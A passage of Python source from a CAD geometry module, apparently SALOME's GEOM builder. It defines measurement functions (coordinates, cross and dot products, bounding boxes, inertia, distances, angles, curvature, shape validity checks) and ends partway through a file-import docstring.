Perform an Archimde operation on the given shape with given parameters.
The object presenting the resulting face is returned.
Parameters:
theShape Shape to be put in water.
theWeight Weight og the shape.
theWaterDensity Density of the water.
theMeshDeflection Deflection of the mesh, using to compute the section.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a section of theShape
by a plane, corresponding to water level.
"""
# Example: see GEOM_TestAll.py
theWeight,theWaterDensity,theMeshDeflection,Parameters = ParseParameters(
theWeight,theWaterDensity,theMeshDeflection)
anObj = self.LocalOp.MakeArchimede(theShape, theWeight, theWaterDensity, theMeshDeflection)
RaiseIfFailed("MakeArchimede", self.LocalOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "archimede")
return anObj
# end of l3_basic_op
## @}
## @addtogroup l2_measure
## @{
## Get point coordinates
# @return [x, y, z]
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def PointCoordinates(self,Point):
"""
Get point coordinates
Returns:
[x, y, z]
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.PointCoordinates(Point)
RaiseIfFailed("PointCoordinates", self.MeasuOp)
return aTuple
## Get vector coordinates
# @return [x, y, z]
#
# @ref tui_measurement_tools_page "Example"
def VectorCoordinates(self,Vector):
"""
Get vector coordinates
Returns:
[x, y, z]
"""
p1=self.GetFirstVertex(Vector)
p2=self.GetLastVertex(Vector)
X1=self.PointCoordinates(p1)
X2=self.PointCoordinates(p2)
return (X2[0]-X1[0],X2[1]-X1[1],X2[2]-X1[2])
## Compute cross product
# @return vector w=u^v
#
# @ref tui_measurement_tools_page "Example"
def CrossProduct(self, Vector1, Vector2):
"""
Compute cross product
Returns: vector w=u^v
"""
u=self.VectorCoordinates(Vector1)
v=self.VectorCoordinates(Vector2)
w=self.MakeVectorDXDYDZ(u[1]*v[2]-u[2]*v[1], u[2]*v[0]-u[0]*v[2], u[0]*v[1]-u[1]*v[0])
return w
## Compute cross product
# @return dot product p=u.v
#
# @ref tui_measurement_tools_page "Example"
def DotProduct(self, Vector1, Vector2):
"""
Compute cross product
Returns: dot product p=u.v
"""
u=self.VectorCoordinates(Vector1)
v=self.VectorCoordinates(Vector2)
p=u[0]*v[0]+u[1]*v[1]+u[2]*v[2]
return p
## Get summarized length of all wires,
# area of surface and volume of the given shape.
# @param theShape Shape to define properties of.
# @return [theLength, theSurfArea, theVolume]\n
# theLength: Summarized length of all wires of the given shape.\n
# theSurfArea: Area of surface of the given shape.\n
# theVolume: Volume of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def BasicProperties(self,theShape):
"""
Get summarized length of all wires,
area of surface and volume of the given shape.
Parameters:
theShape Shape to define properties of.
Returns:
[theLength, theSurfArea, theVolume]
theLength: Summarized length of all wires of the given shape.
theSurfArea: Area of surface of the given shape.
theVolume: Volume of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetBasicProperties(theShape)
RaiseIfFailed("GetBasicProperties", self.MeasuOp)
return aTuple
## Get parameters of bounding box of the given shape
# @param theShape Shape to obtain bounding box of.
# @param precise TRUE for precise computation; FALSE for fast one.
# @return [Xmin,Xmax, Ymin,Ymax, Zmin,Zmax]
# Xmin,Xmax: Limits of shape along OX axis.
# Ymin,Ymax: Limits of shape along OY axis.
# Zmin,Zmax: Limits of shape along OZ axis.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def BoundingBox (self, theShape, precise=False):
"""
Get parameters of bounding box of the given shape
Parameters:
theShape Shape to obtain bounding box of.
precise TRUE for precise computation; FALSE for fast one.
Returns:
[Xmin,Xmax, Ymin,Ymax, Zmin,Zmax]
Xmin,Xmax: Limits of shape along OX axis.
Ymin,Ymax: Limits of shape along OY axis.
Zmin,Zmax: Limits of shape along OZ axis.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetBoundingBox(theShape, precise)
RaiseIfFailed("GetBoundingBox", self.MeasuOp)
return aTuple
## Get bounding box of the given shape
# @param theShape Shape to obtain bounding box of.
# @param precise TRUE for precise computation; FALSE for fast one.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created box.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MakeBoundingBox (self, theShape, precise=False, theName=None):
"""
Get bounding box of the given shape
Parameters:
theShape Shape to obtain bounding box of.
precise TRUE for precise computation; FALSE for fast one.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created box.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.MakeBoundingBox(theShape, precise)
RaiseIfFailed("MakeBoundingBox", self.MeasuOp)
self._autoPublish(anObj, theName, "bndbox")
return anObj
## Get inertia matrix and moments of inertia of theShape.
# @param theShape Shape to calculate inertia of.
# @return [I11,I12,I13, I21,I22,I23, I31,I32,I33, Ix,Iy,Iz]
# I(1-3)(1-3): Components of the inertia matrix of the given shape.
# Ix,Iy,Iz: Moments of inertia of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def Inertia(self,theShape):
"""
Get inertia matrix and moments of inertia of theShape.
Parameters:
theShape Shape to calculate inertia of.
Returns:
[I11,I12,I13, I21,I22,I23, I31,I32,I33, Ix,Iy,Iz]
I(1-3)(1-3): Components of the inertia matrix of the given shape.
Ix,Iy,Iz: Moments of inertia of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetInertia(theShape)
RaiseIfFailed("GetInertia", self.MeasuOp)
return aTuple
## Get if coords are included in the shape (ST_IN or ST_ON)
# @param theShape Shape
# @param coords list of points coordinates [x1, y1, z1, x2, y2, z2, ...]
# @param tolerance to be used (default is 1.0e-7)
# @return list_of_boolean = [res1, res2, ...]
@ManageTransactions("MeasuOp")
def AreCoordsInside(self, theShape, coords, tolerance=1.e-7):
"""
Get if coords are included in the shape (ST_IN or ST_ON)
Parameters:
theShape Shape
coords list of points coordinates [x1, y1, z1, x2, y2, z2, ...]
tolerance to be used (default is 1.0e-7)
Returns:
list_of_boolean = [res1, res2, ...]
"""
return self.MeasuOp.AreCoordsInside(theShape, coords, tolerance)
## Get minimal distance between the given shapes.
# @param theShape1,theShape2 Shapes to find minimal distance between.
# @return Value of the minimal distance between the given shapes.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MinDistance(self, theShape1, theShape2):
"""
Get minimal distance between the given shapes.
Parameters:
theShape1,theShape2 Shapes to find minimal distance between.
Returns:
Value of the minimal distance between the given shapes.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetMinDistance(theShape1, theShape2)
RaiseIfFailed("GetMinDistance", self.MeasuOp)
return aTuple[0]
## Get minimal distance between the given shapes.
# @param theShape1,theShape2 Shapes to find minimal distance between.
# @return Value of the minimal distance between the given shapes, in form of list
# [Distance, DX, DY, DZ].
#
# @ref swig_all_measure "Example"
@ManageTransactions("MeasuOp")
def MinDistanceComponents(self, theShape1, theShape2):
"""
Get minimal distance between the given shapes.
Parameters:
theShape1,theShape2 Shapes to find minimal distance between.
Returns:
Value of the minimal distance between the given shapes, in form of list
[Distance, DX, DY, DZ]
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetMinDistance(theShape1, theShape2)
RaiseIfFailed("GetMinDistance", self.MeasuOp)
aRes = [aTuple[0], aTuple[4] - aTuple[1], aTuple[5] - aTuple[2], aTuple[6] - aTuple[3]]
return aRes
## Get closest points of the given shapes.
# @param theShape1,theShape2 Shapes to find closest points of.
# @return The number of found solutions (-1 in case of infinite number of
# solutions) and a list of (X, Y, Z) coordinates for all couples of points.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def ClosestPoints (self, theShape1, theShape2):
"""
Get closest points of the given shapes.
Parameters:
theShape1,theShape2 Shapes to find closest points of.
Returns:
The number of found solutions (-1 in case of infinite number of
solutions) and a list of (X, Y, Z) coordinates for all couples of points.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.ClosestPoints(theShape1, theShape2)
RaiseIfFailed("ClosestPoints", self.MeasuOp)
return aTuple
## Get angle between the given shapes in degrees.
# @param theShape1,theShape2 Lines or linear edges to find angle between.
# @note If both arguments are vectors, the angle is computed in accordance
# with their orientations, otherwise the minimum angle is computed.
# @return Value of the angle between the given shapes in degrees.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngle(self, theShape1, theShape2):
"""
Get angle between the given shapes in degrees.
Parameters:
theShape1,theShape2 Lines or linear edges to find angle between.
Note:
If both arguments are vectors, the angle is computed in accordance
with their orientations, otherwise the minimum angle is computed.
Returns:
Value of the angle between the given shapes in degrees.
"""
# Example: see GEOM_TestMeasures.py
anAngle = self.MeasuOp.GetAngle(theShape1, theShape2)
RaiseIfFailed("GetAngle", self.MeasuOp)
return anAngle
## Get angle between the given shapes in radians.
# @param theShape1,theShape2 Lines or linear edges to find angle between.
# @note If both arguments are vectors, the angle is computed in accordance
# with their orientations, otherwise the minimum angle is computed.
# @return Value of the angle between the given shapes in radians.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngleRadians(self, theShape1, theShape2):
"""
Get angle between the given shapes in radians.
Parameters:
theShape1,theShape2 Lines or linear edges to find angle between.
Note:
If both arguments are vectors, the angle is computed in accordance
with their orientations, otherwise the minimum angle is computed.
Returns:
Value of the angle between the given shapes in radians.
"""
# Example: see GEOM_TestMeasures.py
anAngle = self.MeasuOp.GetAngle(theShape1, theShape2)*math.pi/180.
RaiseIfFailed("GetAngle", self.MeasuOp)
return anAngle
## Get angle between the given vectors in degrees.
# @param theShape1,theShape2 Vectors to find angle between.
# @param theFlag If True, the normal vector is defined by the two vectors cross,
# if False, the opposite vector to the normal vector is used.
# @return Value of the angle between the given vectors in degrees.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetAngleVectors(self, theShape1, theShape2, theFlag = True):
"""
Get angle between the given vectors in degrees.
Parameters:
theShape1,theShape2 Vectors to find angle between.
theFlag If True, the normal vector is defined by the two vectors cross,
if False, the opposite vector to the normal vector is used.
Returns:
Value of the angle between the given vectors in degrees.
"""
anAngle = self.MeasuOp.GetAngleBtwVectors(theShape1, theShape2)
if not theFlag:
anAngle = 360. - anAngle
RaiseIfFailed("GetAngleVectors", self.MeasuOp)
return anAngle
## The same as GetAngleVectors, but the result is in radians.
def GetAngleRadiansVectors(self, theShape1, theShape2, theFlag = True):
"""
Get angle between the given vectors in radians.
Parameters:
theShape1,theShape2 Vectors to find angle between.
theFlag If True, the normal vector is defined by the two vectors cross,
if False, the opposite vector to the normal vector is used.
Returns:
Value of the angle between the given vectors in radians.
"""
anAngle = self.GetAngleVectors(theShape1, theShape2, theFlag)*math.pi/180.
return anAngle
## @name Curve Curvature Measurement
# Methods for receiving radius of curvature of curves
# in the given point
## @{
## Measure curvature of a curve at a point, set by parameter.
# @param theCurve a curve.
# @param theParam parameter.
# @return radius of curvature of \a theCurve.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def CurveCurvatureByParam(self, theCurve, theParam):
"""
Measure curvature of a curve at a point, set by parameter.
Parameters:
theCurve a curve.
theParam parameter.
Returns:
radius of curvature of theCurve.
"""
# Example: see GEOM_TestMeasures.py
aCurv = self.MeasuOp.CurveCurvatureByParam(theCurve,theParam)
RaiseIfFailed("CurveCurvatureByParam", self.MeasuOp)
return aCurv
## Measure curvature of a curve at a point.
# @param theCurve a curve.
# @param thePoint given point.
# @return radius of curvature of \a theCurve.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def CurveCurvatureByPoint(self, theCurve, thePoint):
"""
Measure curvature of a curve at a point.
Parameters:
theCurve a curve.
thePoint given point.
Returns:
radius of curvature of theCurve.
"""
aCurv = self.MeasuOp.CurveCurvatureByPoint(theCurve,thePoint)
RaiseIfFailed("CurveCurvatureByPoint", self.MeasuOp)
return aCurv
## @}
## @name Surface Curvature Measurement
# Methods for receiving max and min radius of curvature of surfaces
# in the given point
## @{
## Measure max radius of curvature of surface.
# @param theSurf the given surface.
# @param theUParam Value of U-parameter on the referenced surface.
# @param theVParam Value of V-parameter on the referenced surface.
# @return max radius of curvature of theSurf.
#
## @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MaxSurfaceCurvatureByParam(self, theSurf, theUParam, theVParam):
"""
Measure max radius of curvature of surface.
Parameters:
theSurf the given surface.
theUParam Value of U-parameter on the referenced surface.
theVParam Value of V-parameter on the referenced surface.
Returns:
max radius of curvature of theSurf.
"""
# Example: see GEOM_TestMeasures.py
aSurf = self.MeasuOp.MaxSurfaceCurvatureByParam(theSurf,theUParam,theVParam)
RaiseIfFailed("MaxSurfaceCurvatureByParam", self.MeasuOp)
return aSurf
## Measure max radius of curvature of surface in the given point
# @param theSurf the given surface.
# @param thePoint given point.
# @return max radius of curvature of theSurf.
#
## @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MaxSurfaceCurvatureByPoint(self, theSurf, thePoint):
"""
Measure max radius of curvature of surface in the given point.
Parameters:
theSurf the given surface.
thePoint given point.
Returns:
max radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MaxSurfaceCurvatureByPoint(theSurf,thePoint)
RaiseIfFailed("MaxSurfaceCurvatureByPoint", self.MeasuOp)
return aSurf
## Measure min radius of curvature of surface.
# @param theSurf the given surface.
# @param theUParam Value of U-parameter on the referenced surface.
# @param theVParam Value of V-parameter on the referenced surface.
# @return min radius of curvature of theSurf.
#
## @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MinSurfaceCurvatureByParam(self, theSurf, theUParam, theVParam):
"""
Measure min radius of curvature of surface.
Parameters:
theSurf the given surface.
theUParam Value of U-parameter on the referenced surface.
theVParam Value of V-parameter on the referenced surface.
Returns:
Min radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MinSurfaceCurvatureByParam(theSurf,theUParam,theVParam)
RaiseIfFailed("MinSurfaceCurvatureByParam", self.MeasuOp)
return aSurf
## Measure min radius of curvature of surface in the given point
# @param theSurf the given surface.
# @param thePoint given point.
# @return min radius of curvature of theSurf.
#
## @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def MinSurfaceCurvatureByPoint(self, theSurf, thePoint):
"""
Measure min radius of curvature of surface in the given point.
Parameters:
theSurf the given surface.
thePoint given point.
Returns:
Min radius of curvature of theSurf.
"""
aSurf = self.MeasuOp.MinSurfaceCurvatureByPoint(theSurf,thePoint)
RaiseIfFailed("MinSurfaceCurvatureByPoint", self.MeasuOp)
return aSurf
## @}
## Get min and max tolerances of sub-shapes of theShape
# @param theShape Shape, to get tolerances of.
# @return [FaceMin,FaceMax, EdgeMin,EdgeMax, VertMin,VertMax]\n
# FaceMin,FaceMax: Min and max tolerances of the faces.\n
# EdgeMin,EdgeMax: Min and max tolerances of the edges.\n
# VertMin,VertMax: Min and max tolerances of the vertices.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def Tolerance(self,theShape):
"""
Get min and max tolerances of sub-shapes of theShape
Parameters:
theShape Shape, to get tolerances of.
Returns:
[FaceMin,FaceMax, EdgeMin,EdgeMax, VertMin,VertMax]
FaceMin,FaceMax: Min and max tolerances of the faces.
EdgeMin,EdgeMax: Min and max tolerances of the edges.
VertMin,VertMax: Min and max tolerances of the vertices.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetTolerance(theShape)
RaiseIfFailed("GetTolerance", self.MeasuOp)
return aTuple
## Obtain description of the given shape (number of sub-shapes of each type)
# @param theShape Shape to be described.
# @return Description of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def WhatIs(self,theShape):
"""
Obtain description of the given shape (number of sub-shapes of each type)
Parameters:
theShape Shape to be described.
Returns:
Description of the given shape.
"""
# Example: see GEOM_TestMeasures.py
aDescr = self.MeasuOp.WhatIs(theShape)
RaiseIfFailed("WhatIs", self.MeasuOp)
return aDescr
## Obtain quantity of shapes of the given type in \a theShape.
# If \a theShape is of type \a theType, it is also counted.
# @param theShape Shape to be described.
# @param theType the given ShapeType().
# @return Quantity of shapes of type \a theType in \a theShape.
#
# @ref tui_measurement_tools_page "Example"
def NbShapes (self, theShape, theType):
"""
Obtain quantity of shapes of the given type in theShape.
If theShape is of type theType, it is also counted.
Parameters:
theShape Shape to be described.
theType the given geompy.ShapeType
Returns:
Quantity of shapes of type theType in theShape.
"""
# Example: see GEOM_TestMeasures.py
listSh = self.SubShapeAllIDs(theShape, theType)
Nb = len(listSh)
return Nb
## Obtain quantity of shapes of each type in \a theShape.
# The \a theShape is also counted.
# @param theShape Shape to be described.
# @return Dictionary of ShapeType() with bound quantities of shapes.
#
# @ref tui_measurement_tools_page "Example"
def ShapeInfo (self, theShape):
"""
Obtain quantity of shapes of each type in theShape.
The theShape is also counted.
Parameters:
theShape Shape to be described.
Returns:
Dictionary of geompy.ShapeType with bound quantities of shapes.
"""
# Example: see GEOM_TestMeasures.py
aDict = {}
for typeSh in self.ShapeType:
if typeSh in ( "AUTO", "SHAPE" ): continue
listSh = self.SubShapeAllIDs(theShape, self.ShapeType[typeSh])
Nb = len(listSh)
aDict[typeSh] = Nb
pass
return aDict
def GetCreationInformation(self, theShape):
info = theShape.GetCreationInformation()
# operationName
opName = info.operationName
if not opName: opName = "no info available"
res = "Operation: " + opName
# parameters
for parVal in info.params:
res += " \n %s = %s" % ( parVal.name, parVal.value )
return res
## Get a point, situated at the centre of mass of theShape.
# @param theShape Shape to define centre of mass of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created point.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def MakeCDG(self, theShape, theName=None):
"""
Get a point, situated at the centre of mass of theShape.
Parameters:
theShape Shape to define centre of mass of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created point.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetCentreOfMass(theShape)
RaiseIfFailed("GetCentreOfMass", self.MeasuOp)
self._autoPublish(anObj, theName, "centerOfMass")
return anObj
## Get a vertex sub-shape by index depended with orientation.
# @param theShape Shape to find sub-shape.
# @param theIndex Index to find vertex by this index (starting from zero)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def GetVertexByIndex(self, theShape, theIndex, theName=None):
"""
Get a vertex sub-shape by index depended with orientation.
Parameters:
theShape Shape to find sub-shape.
theIndex Index to find vertex by this index (starting from zero)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetVertexByIndex(theShape, theIndex)
RaiseIfFailed("GetVertexByIndex", self.MeasuOp)
self._autoPublish(anObj, theName, "vertex")
return anObj
## Get the first vertex of wire/edge depended orientation.
# @param theShape Shape to find first vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
def GetFirstVertex(self, theShape, theName=None):
"""
Get the first vertex of wire/edge depended orientation.
Parameters:
theShape Shape to find first vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
# note: auto-publishing is done in self.GetVertexByIndex()
return self.GetVertexByIndex(theShape, 0, theName)
## Get the last vertex of wire/edge depended orientation.
# @param theShape Shape to find last vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vertex.
#
# @ref tui_measurement_tools_page "Example"
def GetLastVertex(self, theShape, theName=None):
"""
Get the last vertex of wire/edge depended orientation.
Parameters:
theShape Shape to find last vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vertex.
"""
# Example: see GEOM_TestMeasures.py
nb_vert = self.NumberOfSubShapes(theShape, self.ShapeType["VERTEX"])
# note: auto-publishing is done in self.GetVertexByIndex()
return self.GetVertexByIndex(theShape, (nb_vert-1), theName)
## Get a normale to the given face. If the point is not given,
# the normale is calculated at the center of mass.
# @param theFace Face to define normale of.
# @param theOptionalPoint Point to compute the normale at.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created vector.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def GetNormal(self, theFace, theOptionalPoint = None, theName=None):
"""
Get a normale to the given face. If the point is not given,
the normale is calculated at the center of mass.
Parameters:
theFace Face to define normale of.
theOptionalPoint Point to compute the normale at.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created vector.
"""
# Example: see GEOM_TestMeasures.py
anObj = self.MeasuOp.GetNormal(theFace, theOptionalPoint)
RaiseIfFailed("GetNormal", self.MeasuOp)
self._autoPublish(anObj, theName, "normal")
return anObj
## Print shape errors obtained from CheckShape.
# @param theShape Shape that was checked.
# @param theShapeErrors the shape errors obtained by CheckShape.
# @param theReturnStatus If 0 the description of problem is printed.
# If 1 the description of problem is returned.
# @return If theReturnStatus is equal to 1 the description is returned.
# Otherwise doesn't return anything.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def PrintShapeErrors(self, theShape, theShapeErrors, theReturnStatus = 0):
"""
Print shape errors obtained from CheckShape.
Parameters:
theShape Shape that was checked.
theShapeErrors the shape errors obtained by CheckShape.
theReturnStatus If 0 the description of problem is printed.
If 1 the description of problem is returned.
Returns:
If theReturnStatus is equal to 1 the description is returned.
Otherwise doesn't return anything.
"""
# Example: see GEOM_TestMeasures.py
Descr = self.MeasuOp.PrintShapeErrors(theShape, theShapeErrors)
if theReturnStatus == 1:
return Descr
print Descr
pass
## Check a topology of the given shape.
# @param theShape Shape to check validity of.
# @param theIsCheckGeom If FALSE, only the shape's topology will be checked, \n
# if TRUE, the shape's geometry will be checked also.
# @param theReturnStatus If 0 and if theShape is invalid, a description
# of problem is printed.
# If 1 isValid flag and the description of
# problem is returned.
# If 2 isValid flag and the list of error data
# is returned.
# @return TRUE, if the shape "seems to be valid".
# If theShape is invalid, prints a description of problem.
# If theReturnStatus is equal to 1 the description is returned
# along with IsValid flag.
# If theReturnStatus is equal to 2 the list of error data is
# returned along with IsValid flag.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def CheckShape(self,theShape, theIsCheckGeom = 0, theReturnStatus = 0):
"""
Check a topology of the given shape.
Parameters:
theShape Shape to check validity of.
theIsCheckGeom If FALSE, only the shape's topology will be checked,
if TRUE, the shape's geometry will be checked also.
theReturnStatus If 0 and if theShape is invalid, a description
of problem is printed.
If 1 IsValid flag and the description of
problem is returned.
If 2 IsValid flag and the list of error data
is returned.
Returns:
TRUE, if the shape "seems to be valid".
If theShape is invalid, prints a description of problem.
If theReturnStatus is equal to 1 the description is returned
along with IsValid flag.
If theReturnStatus is equal to 2 the list of error data is
returned along with IsValid flag.
"""
# Example: see GEOM_TestMeasures.py
if theIsCheckGeom:
(IsValid, ShapeErrors) = self.MeasuOp.CheckShapeWithGeometry(theShape)
RaiseIfFailed("CheckShapeWithGeometry", self.MeasuOp)
else:
(IsValid, ShapeErrors) = self.MeasuOp.CheckShape(theShape)
RaiseIfFailed("CheckShape", self.MeasuOp)
if IsValid == 0:
if theReturnStatus == 0:
Descr = self.MeasuOp.PrintShapeErrors(theShape, ShapeErrors)
print Descr
if theReturnStatus == 1:
Descr = self.MeasuOp.PrintShapeErrors(theShape, ShapeErrors)
return (IsValid, Descr)
elif theReturnStatus == 2:
return (IsValid, ShapeErrors)
return IsValid
## Detect self-intersections in the given shape.
# @param theShape Shape to check.
# @return TRUE, if the shape contains no self-intersections.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("MeasuOp")
def CheckSelfIntersections(self, theShape):
"""
Detect self-intersections in the given shape.
Parameters:
theShape Shape to check.
Returns:
TRUE, if the shape contains no self-intersections.
"""
# Example: see GEOM_TestMeasures.py
(IsValid, Pairs) = self.MeasuOp.CheckSelfIntersections(theShape)
RaiseIfFailed("CheckSelfIntersections", self.MeasuOp)
return IsValid
## Get position (LCS) of theShape.
#
# Origin of the LCS is situated at the shape's center of mass.
# Axes of the LCS are obtained from shape's location or,
# if the shape is a planar face, from position of its plane.
#
# @param theShape Shape to calculate position of.
# @return [Ox,Oy,Oz, Zx,Zy,Zz, Xx,Xy,Xz].
# Ox,Oy,Oz: Coordinates of shape's LCS origin.
# Zx,Zy,Zz: Coordinates of shape's LCS normal(main) direction.
# Xx,Xy,Xz: Coordinates of shape's LCS X direction.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def GetPosition(self,theShape):
"""
Get position (LCS) of theShape.
Origin of the LCS is situated at the shape's center of mass.
Axes of the LCS are obtained from shape's location or,
if the shape is a planar face, from position of its plane.
Parameters:
theShape Shape to calculate position of.
Returns:
[Ox,Oy,Oz, Zx,Zy,Zz, Xx,Xy,Xz].
Ox,Oy,Oz: Coordinates of shape's LCS origin.
Zx,Zy,Zz: Coordinates of shape's LCS normal(main) direction.
Xx,Xy,Xz: Coordinates of shape's LCS X direction.
"""
# Example: see GEOM_TestMeasures.py
aTuple = self.MeasuOp.GetPosition(theShape)
RaiseIfFailed("GetPosition", self.MeasuOp)
return aTuple
## Get kind of theShape.
#
# @param theShape Shape to get a kind of.
# @return Returns a kind of shape in terms of <VAR>GEOM.GEOM_IKindOfShape.shape_kind</VAR> enumeration
# and a list of parameters, describing the shape.
# @note Concrete meaning of each value, returned via \a theIntegers
# or \a theDoubles list depends on the kind() of the shape.
#
# @ref swig_todo "Example"
@ManageTransactions("MeasuOp")
def KindOfShape(self,theShape):
"""
Get kind of theShape.
Parameters:
theShape Shape to get a kind of.
Returns:
a kind of shape in terms of GEOM_IKindOfShape.shape_kind enumeration
and a list of parameters, describing the shape.
Note:
Concrete meaning of each value, returned via theIntegers
or theDoubles list depends on the geompy.kind of the shape
"""
# Example: see GEOM_TestMeasures.py
aRoughTuple = self.MeasuOp.KindOfShape(theShape)
RaiseIfFailed("KindOfShape", self.MeasuOp)
aKind = aRoughTuple[0]
anInts = aRoughTuple[1]
aDbls = aRoughTuple[2]
# Now there is no exception from this rule:
aKindTuple = [aKind] + aDbls + anInts
# If they are we will regroup parameters for such kind of shape.
# For example:
#if aKind == kind.SOME_KIND:
# # SOME_KIND int int double int double double
# aKindTuple = [aKind, anInts[0], anInts[1], aDbls[0], anInts[2], aDbls[1], aDbls[2]]
return aKindTuple
## Returns the string that describes if the shell is good for solid.
# This is a support method for MakeSolid.
#
# @param theShell the shell to be checked.
# @return Returns a string that describes the shell validity for
# solid construction.
@ManageTransactions("MeasuOp")
def _IsGoodForSolid(self, theShell):
"""
Returns the string that describes if the shell is good for solid.
This is a support method for MakeSolid.
Parameter:
theShell the shell to be checked.
Returns:
Returns a string that describes the shell validity for
solid construction.
"""
aDescr = self.MeasuOp.IsGoodForSolid(theShell)
return aDescr
# end of l2_measure
## @}
## @addtogroup l2_import_export
## @{
## Import a shape from the BREP, IGES, STEP or other file
# (depends on given format) with given name.
#
# Note: this function is deprecated, it is kept for backward compatibility only
# Use Import<FormatName> instead, where <FormatName> is a name of desirable format to import.
#
# @param theFileName The file, containing the shape.
# @param theFormatName Specify format for the file reading.
# Available formats can be obtained with InsertOp.ImportTranslators() method.
# If format 'IGES_SCALE' is used instead of 'IGES' or
# format 'STEP_SCALE' is used instead of 'STEP',
# length unit will be set to 'meter' and result model will be scaled.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the imported shape.
# If material names are imported it returns the list of
# objects. The first one is the imported object followed by
# material groups.
# @note Auto publishing is allowed for the shape itself. Imported
# material groups are not automatically published.
#
# @ref swig_Import_Export "Example"
@ManageTransactions("InsertOp")
def ImportFile(self, theFileName, theFormatName, theName=None):
"""
Import a shape from the BREP, IGES, STEP or other file
(depends on given format) with given name.
Note: this function is deprecated, it is kept for backward compatibility only
Use Import<FormatName> instead, where <FormatName> is a name of desirable format to import.
Parameters:
theFileName The file, containing the shape.
theFormatName Specify format for the file reading.
Available formats can be obtained with geompy.InsertOp.ImportTranslators() method.
If format 'IGES_SCALE' is used instead of 'IGES' or
format 'STEP_SCALE' is used instead of 'STEP',
length unit will be set to 'meter' and result model will be scaled.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the imported shape.
If material names are imported it returns the list of
